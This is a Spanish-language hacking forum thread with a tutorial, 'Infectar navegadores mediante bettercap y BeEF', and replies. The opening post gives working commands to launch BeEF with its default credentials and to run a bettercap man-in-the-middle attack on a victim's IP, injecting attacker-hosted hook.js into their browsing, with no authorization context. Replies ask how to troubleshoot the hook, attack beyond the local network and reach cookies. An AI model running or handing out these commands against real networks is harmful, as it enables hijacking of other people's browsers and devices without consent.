Infectar navegadores mediante bettercap y BeEF

Iniciado por Lonewolf, Octubre 12, 2016, 05:15:03 AM

Tema anterior - Siguiente tema

0 Miembros y 3 Visitantes están viendo este tema.

Octubre 12, 2016, 05:15:03 AM Ultima modificación: Octubre 13, 2016, 12:05:25 PM por HATI
Hola a todos, en esta entrada vamos a aprender como infectar navegadores con codigo javascript  :)
Primero un poco de teoria.

¿Que es BeEF?
Basicamente BeEF es un framework diseñado para la explotacion de navegadores atravez de codigo javascript , dicho framework tiene una grandisima cantidad de opciones de post-explotacion que vamos a ver en profundidad en las siguientes entradas .


¿Que es Bettercap ?
Bettercap es un framework para ataques MITM (man in the middle) completo y modular que surgió con el objetivo de brindarnos una herramienta mas completa y estable que ettercap.

Ahora pasemos a la parte divertida ;)


Primero vamos a abrir un terminal y vamos a correr beef con el siguiente comando:
Código: php
beef-xss




Luego de lanzar este comando automaticamente se nos tendria que abrir una ventana del navegador asi:




En el caso de que el navegador no se abra lo abrimos nosotros y colocamos la siguiente direccion: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El usuario y contraseña por efecto son:

user: beef
pass: beef




Ok, por ahora dejariamos beef asi, pasemos a Bettercap:

Abrimos otra terminal en la que lanzaremos bettercap indicandole nuestro target (objetivo) , el modulo que vamos a utilizar y la ruta del javascript malicioso proporcionado por beef con el siguiente comando:
Código: php
bettercap -T 192.168.0.101 --proxy-module injectjs --js-url "http://192.168.0.104:3000/hook.js"




Luego tendriamos que ver lo siguiente:




ahora vamos a ver como bettercap inyecta el codigo javascript que le indicamos en las peticiones de nuestra victima  8)




Muy bien como vemos nuestra victima ingreso a la pagina No tienes permitido ver los links. Registrarse o Entrar a mi cuenta desde su android , ( en este caso la maquina victima es un smartphone pero el ataque es igualmente eficaz en cualquier tipo de dispositivo o so ) y la herramienta automaticamente inyecto el codigo javascript .
Bien ahora veamos que pasa por el lado de nuestro querido beef:




Perfecto!!! veamos la informacion de el navegador victima.




Muy bien asta aca llego este post , esten atentos a nuevas entradas ya que aprenderemos a obtener una sesion de meterpreter mediante esta gran herramienta .



"Todos tenemos un defecto , un error en nuestro código "


muy interesante man, lo que no veo en la imagen es el javascript malicioso que dices que inyecta!! igual voy a probarlo, muchas gracias por tu aporte!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
muy interesante man, lo que no veo en la imagen es el javascript malicioso que dices que inyecta!! igual voy a probarlo, muchas gracias por tu aporte!
Gracias por el comentario ceroMee !!! , fijate en la parte baja de la imajen donde dice [INJECTJS] eso seria parte de el proceso , no pude colocar todo el proceso ya que serian muchas imagenes jaja
"Todos tenemos un defecto , un error en nuestro código "

Suena interesante, pero no entendí la parte de inyectar a la victima, se le atacara mediante dirección mac o como?
buen aporte :DD

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta por el navegador

Citar¿Que es BeEF?
Basicamente BeEF es un framework diseñado para la explotacion de navegadores atravez de codigo javascript , dicho framework tiene una grandisima cantidad de opciones de post-explotacion que vamos a ver en profundidad en las siguientes entradas .






Man una pregunta, seguiste algun tutorial en especifico para instalr bettercap y beef?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Man una pregunta, seguiste algun tutorial en especifico para instalr bettercap y beef?
Hola ceromee si , en internet hay varios , primeramente tenes que instalar ruby on rails = sudo apt-get install build-essential ruby-dev libpcap-dev

segundo para instalar bettercap solamente tienes que ejecutar el comando = gem install bettercap ,obiamente despues de tener ruby

y por ulltimo para instalar beef te recomiendo seguir la guia de instalacion en su pagina de github No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

"Todos tenemos un defecto , un error en nuestro código "

Saludos chicos , alguien me puede ayudar?
no me funciona pongo a correr bettercap realizo una busqueda en mi dispositivo y no se hookea, que puede ser ?

Julio 31, 2017, 03:29:12 PM #9 Ultima modificación: Julio 31, 2017, 03:34:00 PM por Akrapal
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Saludos chicos , alguien me puede ayudar?
no me funciona pongo a correr bettercap realizo una busqueda en mi dispositivo y no se hookea, que puede ser ?

me pasa igual.. dice que inyecta pero nada, probe  con injecthtml pero lo mismo

edit: le instale chrome a la maquina virtual y agarro

Hola de nuevo, creo que para algunos de nosotros seria importante conocer la estructura de los comandos o parte de ella, ya que si bien usamos otros framework o tools mediante la terminal podemos confundirnos al momento de empezar a usar este grandioso Framework, o es una simple opinion en el este caso al tratar de comprender la ultima parte de lo siguiente:

Citarbettercap -T 192.168.0.101 --proxy-module injectjs --js-url "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"

Quisiera imaginar que aquí especificas el Target
Citar-T 192.168.0.101

Aqui especificas el modulo a usar
Citar--proxy-module injectjs

Aqui pensaria que le pasas opciones del modulo especifico
Citar--js-url


Y por ultimo la IP del atacante (Tu IP) donde se aloja el JavaScript
Citar"No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"



Por favor si estoy mal díganmelo para poder entender un poco mas este framework aun no lo comienzo a usar pero me resulto de muy buena pinta este tutorial que creo pudiésemos ocupar para combinarlo con otros vectores.
[color="red"][font="Monotype Corsiva"]La mente es como un paracaídas, Solo funciona si la abres.[/font][/color]
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Aunque el post sea viejo merece un aplauso.

Muchas gracias!!!

Enviado desde mi GT-I9505 mediante Tapatalk

"La mejor forma de obtener información correcta de los foros, es enviar algo incorrecto y esperar las correcciones"
-- Matthew Austern --

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola de nuevo, creo que para algunos de nosotros seria importante conocer la estructura de los comandos o parte de ella, ya que si bien usamos otros framework o tools mediante la terminal podemos confundirnos al momento de empezar a usar este grandioso Framework, o es una simple opinion en el este caso al tratar de comprender la ultima parte de lo siguiente:

Citarbettercap -T 192.168.0.101 --proxy-module injectjs --js-url "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"

Quisiera imaginar que aquí especificas el Target
Citar-T 192.168.0.101

Aqui especificas el modulo a usar
Citar--proxy-module injectjs

Aqui pensaria que le pasas opciones del modulo especifico
Citar--js-url


Y por ultimo la IP del atacante (Tu IP) donde se aloja el JavaScript
Citar"No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"



Por favor si estoy mal díganmelo para poder entender un poco mas este framework aun no lo comienzo a usar pero me resulto de muy buena pinta este tutorial que creo pudiésemos ocupar para combinarlo con otros vectores.

Exactamente todo lo que dijiste, es correcto.
Ademas de infectar de forma rapida atravez de spoof, hay forma de hacerlo con un portal cautivo ?
O habria que editar el index.html de /www/var para modificar la pagina del "hook.js" ?
Pikaa~


Una pregunta solo se puede hacer en linux? y otra es puedo hacerla con una ip externa? ajena a mi Router?

Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si solo se puede en linux. y y se hacer con una IP externa "fuera de la red LAN"

Saludos..





No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Una pregunta solo se puede hacer en linux? y otra es puedo hacerla con una ip externa? ajena a mi Router?

Podes intentarlo con un emulador como GNS3 o EVE, configurando los nats en cada router y ganar esa experiencia de hacerlo en "wan"....

BTW
Por otro lado, buen post, hubiera sido fantástico que hubieras puesto la imagen del navegador de la victima. Pero igual buen post. Otra cosa que me pareció interesante y no se si se puede hacer con beff (yo nunca lo he usado) pero es curioso que la mayoría de las personas dejan las cookies activas en los navegadores por defecto, entonces si beff poseé un modulo para cookies sería algo más profundo e interesante...

Buen post muchacho
"Cuando se nace pobre, estudiar es el mayor acto de rebeldía contra el sistema. El saber rompe las cadenas de la esclavitud" -Tomas Bulat.

quede con ganas de algo mas....
esta muy bueno el post me gustaria ver pruebas de pentest reales ojala en en alguna ctf para ir tomando experiencia.
me motive aunque quede con el gustito de algo mas..

Muchas gracias por el post y toda la informacion me as ayudado bastante :)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Gracias por el post, hay algo másnuevo aparte de beef?, yo lo utilicé usando Armitage, que es genial. Pero sinceramente me cuesta acceder desde afuera de la lan, hacía una red wan aparte. Se puede usar bien beef por fuera de la red lan?. Digamo sin haber entrado directamente por otra forma a la red;tendríamos que usar algo para entrar aparte?.